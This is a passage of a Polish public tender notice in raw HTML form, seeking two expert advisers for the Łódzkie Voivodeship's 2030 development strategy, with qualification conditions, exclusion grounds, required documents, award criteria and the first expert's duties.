id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">- Zadanie nr 1 (ekspert 1)Wykonawca winien wykazać, że dysponuje lub będzie dysponować osobami do realizacji zamówienia w liczbie co najmniej 1 osoba i spełniającymi poniższe warunki: o	Posiadanie tytułu naukowego (co najmniej w stopniu doktora habilitowanego) w dziedzinie ekonomii lub zarządzania lub gospodarki przestrzennej lub geografii;o	Doświadczenie w opracowywaniu lub aktualizacji co najmniej jednej strategii rozwoju województwa i co najmniej jednej strategii rozwoju innowacji lub co najmniej jednego opracowania branżowego z zakresu innowacyjności (załącznik 5).Wykonawca na potwierdzenie spełniania tego warunku winien wypełnić i dostarczyć załącznik nr 5 do SIWZ.- Zadanie nr 2 ( ekspert 2)Wykonawca winien wykazać, że dysponuje lub będzie dysponować osobami do realizacji zamówienia w liczbie co najmniej 1 osoba i spełniającymi poniższe warunki:o Posiadanie tytułu naukowego (co najmniej w stopniu doktora habilitowanego) w dziedzinie ekonomii lub zarządzania lub gospodarki przestrzennej lub geografii;o	Doświadczenie w opracowywaniu lub aktualizacji co najmniej jednej strategii rozwoju województwa i co najmniej jednej strategii ponadregionalnej lub co najmniej jednej strategii krajowej (załącznik 5).Wykonawca na potwierdzenie spełniania tego warunku winien wypełnić i dostarczyć załącznik nr 5 do SIWZ.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Imiona i nazwiska osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób zawarte będa w załączniku nr 5 do SIWZ. </span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Załącznik nr 5 do SIWZ</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wykonawca (SAMODZIELNIE), w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia (wg wzoru stanowiącego Załącznik nr 6 do SIWZ). 2.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców.- załącznik nr 4 - formularz ofertowy;- załączniki 4a i 4b.- pełnomocnictwo - jeżeli jest konieczne (w przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo, pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy);- Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania spełniania warunków udziału składa wraz z ofertą pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (zgodnie z pkt. VII.2 SIWZ)- zastrzeżenie informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca zastrzega takie informacje).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Autorstwo, współautorstwo lub redakcja publikacji naukowych</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Człnkostwo w zespole naukowym</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Liczba godzin dodatkowych konsultacji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">20.Zmiana umowy w stosunku do treści oferty złożonej przez Wykonawcę w trakcie postępowania o udzielenie zamówienia publicznego obejmującego przedmiot umowy dopuszczalna jest jedynie po uzyskaniu zgody Zamawiającego w następujących przypadkach i zakresie:1)	zmiany nazwy, adresu, statusu firmy/Wykonawcy,2)	zmiany podwykonawcy, podmiotu na którego Wykonawca powołał się w trybie art. 22a ustawy PZP przy pomocy którego Wykonawca realizuje przedmiot umowy po uprzedniej akceptacji innego podwykonawcy, podmiotu przez Zamawiającego.21.Nie stanowi istotnej zmiany umowy w rozumieniu art. 144 ust. 1e ustawy Pzp w szczególności:1)	zmiana danych związanych z obsługą administracyjno- organizacyjną umowy (np.: zmiana nr rachunku bankowego),2)	zmiana danych teleadresowych, zmiana osób wskazanych do kontaktów między Stronami.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-02-07</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Do SIWZ załączono klauzulę informacyjną z art. 13 RODO</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Ekspert 1</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług doradztwa eksperckiego przy opracowaniu Strategii Rozwoju Województwa Łódzkiego 2030I. UZASADNIENIE REALIZACJI ZAMÓWIENIAPotrzeba opracowania Strategii Województwa Łódzkiego 2030 wynika ze zmian przyszłej polityki spójności Unii Europejskiej, jak również zbliżającego się zakończenia okresu, którego dotyczy obecna Strategia Rozwoju Województwa Łódzkiego 2020. Ponadto konieczne jest zapewnie spójności strategii regionalnej z zapisami aktualizowanych krajowych dokumentów strategicznych, w tym w szczególności Krajowej Strategii Rozwoju Regionalnego 2030 oraz przyjętego w październiku 2018 r. Uchwałą Rady Ministrów Systemu Zarządzania Rozwojem Polski. System ten zakłada sporządzanie zintegrowanych dokumentów zarządzania polityką rozwoju na wszystkich szczeblach: krajowym, regionalnym i lokalnym. Zapewnienie wszechstronnego i obiektywnego procesu tworzenia Strategii wymaga wsparcia zespołu opracowującego projekt Strategii przez zewnętrznych, niezależnych ekspertów naukowych. Wyłonieni w przedmiotowym postępowaniu eksperci muszą osobiście uczestniczyć w pracach zgodnie z niżej opisanym harmonogramem (dotyczy zadania nr: 1 i 2).II. PRZEDMIOT ZAMÓWIENIARealizacja zamówienia będzie polegała na wykonaniu dwóch zadań. Jeden Wykonawca może złożyć ofertę tylko na jedno zadanie.Zadanie IRealizacja Zadania I będzie polegała na świadczeniu usług doradztwa na każdym etapie opracowywania Strategii Rozwoju Województwa Łódzkiego 2030 przez Eksperta posiadającego wiedzę w zakresie polityki regionalnej, innowacyjności regionów, procesów rewitalizacji i ekonomiki miast (Ekspert 1). Do obowiązków Eksperta 1 będzie należał:1)	Współudział w przygotowaniu metodyki opracowania Strategii, w tym m. in. wyborze metod i technik badawczych oraz narzędzi analitycznych służących opracowaniu diagnozy.2)	Współudział w przygotowaniu części diagnostycznej Strategii obejmującej: (1) analizę uwarunkowań zewnętrznych oraz trendów rozwojowych o charakterze krajowym, europejskim i globalnym, (2) analizę uwarunkowań wewnętrznych, diagnozę sytuacji społecznej, gospodarczej i przestrzennej województwa wraz z wyznaczeniem obszarów koncentracji diagnozowanych zagadnień, (3) analizę trendów i prognoz rozwojowych województwa w okresie objętym strategią, (4) analizę strategiczną (5) określenie wyzwań rozwojowych z ich terytorializacją;3)	Współudział w określeniu wizji rozwoju regionu.4)	Współudział w określeniu celów i kierunków działań wraz z ich terytorializacją.5)	Współudział w określeniu i delimitacji Obszarów Strategicznej Interwencji.6)	Współudział w określeniu systemu realizacji Strategii, w tym programów wdrożeniowych oraz ram i narzędzi finansowych realizacji Strategii.7)	Współudział w stworzeniu systemu monitorowania i ewaluacji Strategii.8)	Współudział w przygotowaniu i prowadzeniu debat strategicznych w ramach RFT.Wykonawcy przedmiotu zamówienia (Ekspert nr 1 i Ekspert nr 2) są zobowiązaniu do:1.	osobistego udziału w 17 spotkaniach konsultacyjnych Zespołu opracowującego projekt SRWŁ 2020, w siedzibie Zamawiającego, w godzinach pracy Biura, średnio po 4 godziny (łącznie 68 godzin w ramach spotkań konsultacyjnych). Poza obligatoryjnym uczestnictwem w spotkaniach konsultacyjnych, dopuszcza się realizację doradztwa drogą elektroniczną (e-mail, wideokonferencja, telekonferencja). 2.	przygotowywania uwag, opiniowania elementów składowych projektu Strategii oraz opracowywania materiałów na spotkania konsultacyjne. Forma i zakres sporządzanych przez Ekspertów uwag, opinii i innych dokumentów przygotowywanych na spotkania konsultacyjne będzie każdorazowo ustalana z Zamawiającym poprzez e-mail. Na pracę merytoryczną związaną z przygotowaniem ww. dokumentów każdy z Ekspertów przeznaczy średnio po 4 godziny przed każdym z 17 spotkań (łącznie 68 godzin na przygotowanie merytoryczne).3.	współudziału w przygotowaniu merytorycznym i przeprowadzeniu debat strategicznych w ramach 4 spotkań Regionalnego Forum Terytorialnego (RFT). Przygotowanie merytoryczne rozumie się jako współudział w określeniu zakresu tematycznego spotkania RFT oraz w opracowaniu treści merytorycznej wystąpień. Prowadzenie debat rozumie się jako przedstawienie wyników kolejnych etapów prac, moderowanie 